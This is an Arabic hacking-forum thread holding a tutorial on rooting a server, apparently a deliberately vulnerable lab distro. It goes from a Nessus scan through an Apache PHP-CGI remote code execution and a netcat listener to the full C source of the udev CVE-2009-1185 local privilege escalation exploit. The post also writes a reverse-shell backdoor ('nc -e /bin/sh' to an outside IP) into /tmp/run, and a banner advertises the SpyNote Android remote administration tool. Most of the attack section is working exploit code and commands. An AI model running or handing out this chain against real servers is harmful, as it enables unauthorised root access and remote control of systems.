1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

[ شرح ] الحصول على الروت بآستخدأم آداة nessus

الموضوع في 'آمن المواقع والسيرفرات' بواسطة 0ne-Tw0, بتاريخ ‏14 مايو 2014.

كاتب الموضوع : 0ne-Tw0 المشاهدات : 564 الردود : 7 ‏14 مايو 2014
  1. غير متصل

    0ne-Tw0
    rank
    Developer

    عضو منذ:
    ‏14 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [​IMG]

    السلام عليكم ورحمة الله وبركاته

    اللهم لا علم لنا الا ماعلمتنا , اللهم علمنا ماينفعنا وانفعنا بما علمتنا انك انت العليم الحكيم.

    بسم الله الرحمن الرحيم

    اليوم درسنا راح يتكلم طريقة الحصول على الروت واليوم بستخدم اداة جديدة وهي nessus

    الاداة فعلا قوية

    نشغلها ونعمل سكان على الضحية

    ونشوف النتايج


    [​IMG]

    نشوف اول ثغرة وهي

    Apache PHP-CGI Remote Code Execution

    يعني نقدر نستخدمها للاتصال بالموقع نفتح BurbSuite ونرسل الطلب ونشوف وش النتيجة

    [​IMG]

    الثغرة شغالة والامر اللي ارسلناه شغال نحاول الان نتصل اتصال عكسي

    نشغل النت كات بالامر

    كود PHP:
    nc -lvp 9898

    ونرسل الطلب ويصير زي كذا
    [​IMG]

    الان الحمدلله تم الاتصال

    [​IMG]

    طبعا بعد البحث في السيرفر اكتشفت فيه الثغرة هذي

    كود PHP:
    /*
     * cve-2009-1185.c
     *
     * udev < 141 Local Privilege Escalation Exploit
     * Jon Oberheide <jon@oberheide.org>
     * http://jon.oberheide.org
     *
     * Information:
     *
     *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
     *
     *   udev before 1.4.1 does not verify whether a NETLINK message originates 
     *   from kernel space, which allows local users to gain privileges by sending 
     *   a NETLINK message from user space.
     *
     * Notes:
     *   
     *   An alternate version of kcope's exploit.  This exploit leverages the 
     *   95-udev-late.rules functionality that is meant to run arbitrary commands 
     *   when a device is removed.  A bit cleaner and reliable as long as your 
     *   distro ships that rule file.
     *
     *   Tested on Gentoo, Intrepid, and Jaunty.
     *
     * Usage:
     *
     *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, 
     *   usually is the udevd PID minus 1) as argv[1].
     *
     *   The exploit will execute /tmp/run as root so throw whatever payload you 
     *   want in there.
     */

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/socket.h>
    #include <linux/types.h>
    #include <linux/netlink.h>

    #ifndef NETLINK_KOBJECT_UEVENT
    #define NETLINK_KOBJECT_UEVENT 15
    #endif

    int
    main
    (int argcchar **argv)
    {
        
    int sock;
        
    char *mp, *err;
        
    char message[4096];
        
    struct stat st;
        
    struct msghdr msg;
        
    struct iovec iovector;
        
    struct sockaddr_nl address;

        if (
    argc 2) {
            
    err "Pass the udevd netlink PID as an argument";
            
    printf("[-] Error: %s\n"err);
            exit(
    1);
        }

        if ((
    stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
            (
    stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
            
    err "Required 95-udev-late.rules not found";
            
    printf("[-] Error: %s\n"err);
            exit(
    1);
        }

        if (
    stat("/tmp/run", &st) == -1) {
            
    err "/tmp/run does not exist, please create it";
            
    printf("[-] Error: %s\n"err);
            exit(
    1);
        }
        
    system("chmod +x /tmp/run");

        
    memset(&address0sizeof(address));
        
    address.nl_family AF_NETLINK;
        
    address.nl_pid atoi(argv[1]);
        
    address.nl_groups 0;

        
    msg.msg_name = (void*)&address;
        
    msg.msg_namelen sizeof(address);
        
    msg.msg_iov = &iovector;
        
    msg.msg_iovlen 1;

        
    sock socket(AF_NETLINKSOCK_DGRAMNETLINK_KOBJECT_UEVENT);
        
    bind(sock, (struct sockaddr *) &addresssizeof(address));

        
    mp message;
        
    mp += sprintf(mp"remove@/d") + 1;
        
    mp += sprintf(mp"SUBSYSTEM=block") + 1;
        
    mp += sprintf(mp"DEVPATH=/dev/foo") + 1;
        
    mp += sprintf(mp"TIMEOUT=10") + 1;
        
    mp += sprintf(mp"ACTION=remove") +1;
        
    mp += sprintf(mp"REMOVE_CMD=/tmp/run") +1;

        
    iovector.iov_base = (void*)message;
        
    iovector.iov_len = (int)(mp-message);

        
    sendmsg(sock, &msg0);

        
    close(sock);

        return 
    0;
    }

    // milw0rm.com [2009-04-30]
    الثغرة ترفع الصلاحيات للملف اللي بتنفذه

    اول شي نكون لنا باكدور عشان لما ننفذه بصلاحيات الروت يعطينا اتصال وصلاحيات الروت

    نشوف

    لاحظوا مسار الملف وين

    كود PHP:
    /tmp/run
    يعني الملف لازم يكون هناك عشان يتطبق

    عشان نسوي باكدور

    نكتب الامر هذا في مجلد

    كود PHP:
    tmp
    كود PHP:
    echo "#!/bin/sh\n/bin/nc -e /bin/sh 172.16.217.1 6789" > /tmp/run
    الامر ببساطة كود باش او شل للاتصال العكسي يعني لو تنفذ الامر بصلاحيات الروت راح يعطينا اتصال عكسي بصلاحيات الروت

    بس الثغرة لو نرجع لها نشوف وش متكوب فيها

    كود PHP:
    udev 141 Local Privilege Escalation Exploit
    طيب نبحث وين العملية هذي

    بالامر

    كود PHP:
    ps auxf grep udev
    [​IMG]

    الان كل اللي علينا

    نشغل الاستغلال زائد رقم العملية ناقص واحد .. لخبطة :ُok:ٌ

    نشوف المثال

    طبعا لازم نسوي لها كومبايل بالامر

    كود PHP:
    gcc -o filename filename.c
    [​IMG]

    يعني بالاساس رقم العملية 2929 حنا نطرح منه واحد

    في الوقت هذا لازم النت كات يكون شغال متنصت على البورت اللي كتبناه في الملف run

    نشوف النتيجة

    [​IMG]

    الحمدلله تم ترويت السيرفر

    السيرفر عبارة عن توزيعة متعمدين الخطا فيها

    وغير هذه الثغرة فيها ثغرات كثير بطرحها لكم لنتعلم جميعا

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    حمل التوزيعة ونصبها على vmware وابدا اختبار لها

    هذا وصلى الله على سيدنا محمد وعلى آله وصحبه اجمعين

    لاتنسوني من صالح الدعاء

    واسف على الاطالة
     


    جاري تحميل الصفحة...
  2. غير متصل

    Hitman
    rank
    Developer

    عضو منذ:
    ‏22 فبراير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    Student
    الإقامة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    يعطيك العافيه ’ {:{7}: واصل :{7}:}
     


  3. غير متصل

    Јoяdαη
    Active DeveloPer

    عضو منذ:
    ‏12 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    Security Hacking Sites
    الإقامة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    وعليكم السلام ورحمهه الله وبركاته
    يعطيك العافيه​
     


  4. غير متصل

    JORDAN 8
    DeveloPer Plus

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    تسلم ايدك يالغالي على شرح رائع و طرح مميز
     


  5. غير متصل

    ÍяâΘ
    rankrank
    Developer

    عضو منذ:
    ‏30 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    يعطيك العافية يا مبدع


    واصل يا بطل
     


  6. غير متصل

    Dr.Azoz
    rankrank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    مشكور ي بطُل وآصل ابداعاتك :{1}:
     


  7. غير متصل

    ★ قبعة القش ★
    V • I • P

    عضو منذ:
    ‏10 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    يعطيك 1000 عافية حبيبي :{10}::{10}:
     


  8. غير متصل

    м̨я.ǚs̲ǝя <div style="border-right: 5px solid; padding: 2px
    ExpErt DeveloPer

    عضو منذ:
    ‏16 ابريل 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    الإقامة:

    رد: الحصول على الروت بآستخدأم آداة nessus

    يعطيك عافية حبيبي
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...